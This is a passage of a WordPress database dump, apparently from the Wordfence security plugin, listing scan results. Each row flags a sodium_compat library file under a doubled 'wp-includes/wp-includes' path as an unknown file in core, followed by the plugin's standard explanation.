More</a>','a:5:{s:4:\"file\";s:67:\"wp-includes/wp-includes/sodium_compat/src/Core/ChaCha20/IetfCtx.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27615,1631424946,1631424946,'new','knownfile',75,'52b1b19541e71eb9b63fcc518e7599ba','8a208c4214b80857a4165b721cd1368e','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/ChaCha20.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/sodium_compat/src/Core/ChaCha20.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27616,1631424947,1631424947,'new','knownfile',75,'407134fea0316e6cffc531c49c671139','f5c415fbe1db6d98f8364e5e62432241','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Fe.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:64:\"wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Fe.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27617,1631424947,1631424947,'new','knownfile',75,'e231d4f0f6c389122f1e9238f558b1c1','3ba2e4ebc788a91cbadd7dd673499cc2','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Ge/Cached.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:71:\"wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Ge/Cached.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27618,1631424947,1631424947,'new','knownfile',75,'53c4a2383b83c565a2c454e6b5361f03','65f2001f44490ed0d1da0a0df56cf37b','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Ge/P1p1.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:69:\"wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Ge/P1p1.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27619,1631424947,1631424947,'new','knownfile',75,'b138f065212addde9024d16a686968f0','96c1cdc6fcbe9e1270b4c4009d7e55e9','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Ge/P2.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:67:\"wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Ge/P2.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27620,1631424947,1631424947,'new','knownfile',75,'9d4f64c54d68688814cda516834f123d','3734999e09d5daf287d1aed81f680154','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Ge/P3.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:67:\"wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Ge/P3.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27621,1631424947,1631424947,'new','knownfile',75,'0f2acd82364ccbfc566c5bd481901604','460bb4a51c68ffc50ed0003fd986f335','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Ge/Precomp.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:72:\"wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Ge/Precomp.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27622,1631424947,1631424947,'new','knownfile',75,'004ce424c9e3503baea3fd00e3e46cbc','0519acb3ae80b2b01b585c0962f037dc','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/H.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:63:\"wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/H.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27623,1631424947,1631424947,'new','knownfile',75,'181495d0c7188ffcfefd0f5c792219c9','c425cb4f27ec47b978ac7ea0ad73cfd6','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/README.md','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:67:\"wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/README.md\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27624,1631424947,1631424947,'new','knownfile',75,'7ae6562935ae3381dad8bccee5c9ba6d','785cf174b93d19cfe8d838ca6aec213e','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/Curve25519.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/sodium_compat/src/Core/Curve25519.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27625,1631424947,1631424947,'new','knownfile',75,'281f1cdb9147d68a18f2a8cf90c74892','e014ac37ac0c2ef24cf163e65a71bfa7','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/Ed25519.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/sodium_compat/src/Core/Ed25519.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27626,1631424947,1631424947,'new','knownfile',75,'ac9edf7d0d07feb79add1411bf6bbfd1','9dc4ced8c4b715ea8d34b34eea64cd4a','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/HChaCha20.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/sodium_compat/src/Core/HChaCha20.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27627,1631424947,1631424947,'new','knownfile',75,'367c972392fde7a15cd46ea6fccefae1','a3892f1edbfe6e0c60f59558c3a01e1f','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/HSalsa20.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/sodium_compat/src/Core/HSalsa20.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27628,1631424947,1631424947,'new','knownfile',75,'04112a0500c2a6afa56e247ef6f447d3','4015050b90e709518ce7f3ed322fe3ef','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/Poly1305/State.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/sodium_compat/src/Core/Poly1305/State.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27629,1631424947,1631424947,'new','knownfile',75,'e88755ed76d4a388b5a178b2d06089c2','1cd9b361bde83248eb8aabec5f2e1c53','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/Poly1305.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/sodium_compat/src/Core/Poly1305.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27630,1631424947,1631424947,'new','knownfile',75,'ec6cd28373e62f78e99583027cb56223','32268b7457ee23c7a70b246bdec953f4','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/Salsa20.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/sodium_compat/src/Core/Salsa20.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27631,1631424947,1631424947,'new','knownfile',75,'b0a2faa9637a454de62b04ef674c8458','cc43fa91254d088c97581697e4ab7a15','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/SecretStream/State.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:69:\"wp-includes/wp-includes/sodium_compat/src/Core/SecretStream/State.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27632,1631424947,1631424947,'new','knownfile',75,'88c40fbc103c930ec00d177f1925252c','21a1e17513094ee635f46c2251a9fa3a','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/SipHash.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/sodium_compat/src/Core/SipHash.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27633,1631424948,1631424948,'new','knownfile',75,'506bb669618039a91f34271ad5936400','21a7b8800707f39140a6dec43d233fc8','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/Util.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/sodium_compat/src/Core/Util.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27634,1631424948,1631424948,'new','knownfile',75,'7d31100b69f14ba7a50051a9747f5079','272c06a7e8bf23232a83a7644d3af602','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/X25519.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/sodium_compat/src/Core/X25519.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27635,1631424948,1631424948,'new','knownfile',75,'9429230fa2bcbe013d137abe3d5b4581','e92e0aa2a10768dc69ca86c06d85be64','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/XChaCha20.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/sodium_compat/src/Core/XChaCha20.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27636,1631424948,1631424948,'new','knownfile',75,'ccd811f67066924dc7c88d473318b067','57fe89dede81647e2497453399c219ae','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/XSalsa20.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/sodium_compat/src/Core/XSalsa20.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27637,1631424948,1631424948,'new','knownfile',75,'8eb0c2c28fdb8a4c128dff4b10c49afd','758c918c2916de88352b64a9e48613bc','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/BLAKE2b.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/sodium_compat/src/Core32/BLAKE2b.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27638,1631424948,1631424948,'new','knownfile',75,'b76c9c5b29f2628f40510f421ec7c6f5','37c7d957541d3e48a19c8cd54e0d7500','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/ChaCha20/Ctx.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/sodium_compat/src/Core32/ChaCha20/Ctx.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27639,1631424948,1631424948,'new','knownfile',75,'62d70c8a8d07c38f605df696a6b372d7','baf4769c867d450f75cb6f7d5034db97','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/ChaCha20/IetfCtx.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:69:\"wp-includes/wp-includes/sodium_compat/src/Core32/ChaCha20/IetfCtx.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27640,1631424948,1631424948,'new','knownfile',75,'15f7b9e79260e1fe5a2988fbf077a030','02385d943d5f857a1976beca8e99847f','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/ChaCha20.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/sodium_compat/src/Core32/ChaCha20.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27641,1631424948,1631424948,'new','knownfile',75,'0ded22492ab010af6d6ca9f74a50d40d','4a69953e7c1e3575a79c34af4a8aef58','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Fe.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:66:\"wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Fe.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27642,1631424948,1631424948,'new','knownfile',75,'60714a7a464ab61e5ba9f5008a9f0eb0','b6c54160be7da60c5a64e2db667735d2','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Cached.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:73:\"wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Cached.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27643,1631424948,1631424948,'new','knownfile',75,'34db436e2fb6466a78bb435c279d6c48','b1db6f640c6d7189f8e064bc31991964','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:71:\"wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27644,1631424948,1631424948,'new','knownfile',75,'400794c311670e6e696ee8ecd3cc1917','1dc02e20955bb77f90aa0b0e770eb321','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P2.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:69:\"wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P2.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27645,1631424948,1631424948,'new','knownfile',75,'fe41a2b0faab6567002b373d98539a0a','b462cd7823fda33dcdfaab3f706531e0','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P3.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:69:\"wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P3.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27646,1631424948,1631424948,'new','knownfile',75,'94419a4e0f8b7bf48f361ec239d01850','cf53bbd039d3bfaa3574da91fe1d14a4','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:74:\"wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27647,1631424949,1631424949,'new','knownfile',75,'6e446275e173ed1840ca612e6cb9c866','7d7460ef65637adde6a184eb55d4a4b5','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/H.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/H.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27648,1631424949,1631424949,'new','knownfile',75,'2580c54fd72673c9952eba20341148f0','f0d3b7019796207c6b9dd58ae151824d','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/README.md','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:69:\"wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/README.md\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27649,1631424949,1631424949,'new','knownfile',75,'5e3d37efb36f0f74db0e1dca53cbea2e','77f254edfefafd88ebcf0c55ea0c1e7f','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:63:\"wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27650,1631424949,1631424949,'new','knownfile',75,'f93ceeb9e8c1fec867d6d24508b0451c','a2f78206f975c4b0b53f9577805baebd','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/Ed25519.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/sodium_compat/src/Core32/Ed25519.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27651,1631424949,1631424949,'new','knownfile',75,'3051fd827b8a1a97ca4e638f9623b4f2','60e1f3c9eecf1179424954ec485834da','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/HChaCha20.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/sodium_compat/src/Core32/HChaCha20.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27652,1631424949,1631424949,'new','knownfile',75,'c01002e8a54959ceac2c93650827ba3f','5b4f89d93d55fa66b0e032cc4a0f49a6','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/HSalsa20.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn 